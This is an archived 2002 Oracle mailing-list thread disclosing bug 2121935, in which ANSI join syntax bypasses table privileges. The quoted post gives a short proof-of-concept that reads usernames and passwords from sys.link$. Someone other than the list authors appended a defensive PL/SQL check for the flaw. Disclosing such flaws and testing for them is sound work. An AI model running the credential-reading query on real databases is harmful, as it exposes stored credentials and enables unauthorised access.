Oracle FAQ Your Portal to the Oracle Knowledge Grid

RE: Security Hole

From: Boivin, Patrice J <BoivinP_at_mar.dfo-mpo.gc.ca>
Date: Tue, 16 Apr 2002 06:43:28 -0800
Message-ID: <F001.004453F0.20020416064328@fatcity.com>


I forwarded it to SANS.

Regards,
Patrice Boivin
Systems Analyst (Oracle Certified DBA)

Systems Admin & Operations | Admin. et Exploit. des systèmes
Technology Services        | Services technologiques
Informatics Branch         | Direction de l'informatique 
Maritimes Region, DFO      | Région des Maritimes, MPO

E-Mail: boivinp_at_mar.dfo-mpo.gc.ca

 -----Original Message-----

Sent:	Tuesday, April 16, 2002 8:33 AM
To:	Multiple recipients of list ORACLE-L
Subject:	Security Hole

This just in from comp.databases.oracle.server.

See metalink bug 2121935.

Using ANSI syntax joins (CROSS JOIN, LEFT OUTER, etc.) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script:

connect / as sysdba
create user us1 identified by us1;
grant create session to us1;

connect us1/us1

select userid, password
from sys.link$ cross join dual;

Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to.

The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN.

Conclusion:

    9.0.1 should not be in use on a production system until Oracle supplies a fix.

Jonathan Lewis
http://www.jlcomp.demon.co.uk

Author of:
Practical Oracle 8i: Building Efficient Databases

Next Seminar - Australia - July/August
http://www.jlcomp.demon.co.uk/seminar.html

Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html

--

Please see the official ORACLE-L FAQ: http://www.orafaq.com
--

Author: Jonathan Lewis
  INET: jonathan_at_jlcomp.demon.co.uk

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
--

Author: Boivin, Patrice J
  INET: BoivinP_at_mar.dfo-mpo.gc.ca

Received on Tue Apr 16 2002 - 09:43:28 CDT
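As an added verification script (not part of either message above, and not Oracle's own), the following SQL*Plus session checks whether an instance still has the privilege bypass from bug 2121935: it creates a throwaway user with CREATE SESSION only, probes the traditional comma join and the ANSI CROSS JOIN form against sys.link$ under that user, and reports DENIED or OPEN for each without selecting any row contents. The user name chk_ansi, its password, and the expectation that a privilege failure surfaces as ORA-00942 are assumptions of this script.

```sql
-- Run in SQL*Plus against a test instance.
-- Assumed names: user chk_ansi / password chk_ansi (constructed for this check).
set serveroutput on

connect / as sysdba
create user chk_ansi identified by chk_ansi;
grant create session to chk_ansi;

connect chk_ansi/chk_ansi

declare
    n number;
    -- Returns 'DENIED' when the privilege check fires (ORA-00942),
    -- 'OPEN' when the query succeeds, or the raw SQLCODE otherwise.
    -- Dynamic SQL is used so the block compiles even though chk_ansi
    -- has no privilege on sys.link$; the failure surfaces at run time.
    function probe(p_sql in varchar2) return varchar2 is
    begin
        execute immediate p_sql into n;
        return 'OPEN';
    exception
        when others then
            if sqlcode = -942 then
                return 'DENIED';
            end if;
            return to_char(sqlcode);
    end;
begin
    -- Traditional join: expected DENIED on every release.
    dbms_output.put_line('traditional join: ' ||
        probe('select count(*) from sys.link$, dual'));
    -- ANSI join form from bug 2121935: OPEN means the instance is
    -- still affected; DENIED is the expected result on a fixed release.
    dbms_output.put_line('ansi cross join : ' ||
        probe('select count(*) from sys.link$ cross join dual'));
end;
/

connect / as sysdba
drop user chk_ansi;
```

Both lines should read DENIED on a fixed release; a mismatch between the two forms is the signature of the bug described above.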
